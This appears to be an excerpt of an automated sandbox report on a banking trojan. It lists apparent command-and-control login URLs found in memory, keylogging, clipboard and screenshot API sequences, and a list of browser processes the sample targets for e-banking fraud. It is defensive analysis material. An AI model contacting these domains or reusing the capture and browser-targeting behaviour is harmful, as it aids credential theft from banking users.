Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1837754876.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845472203.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypic.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: [tab] 33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: [del] 33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: [ins] 33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012F317E memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012E9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_01599530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 27_2_00AE9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 29_2_012A9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 31_2_01119530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_012F9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_013054A0 PathAddBackslashA,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_01302F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii

E-Banking Fraud

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe22_2_012F1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe25_2_015A1900
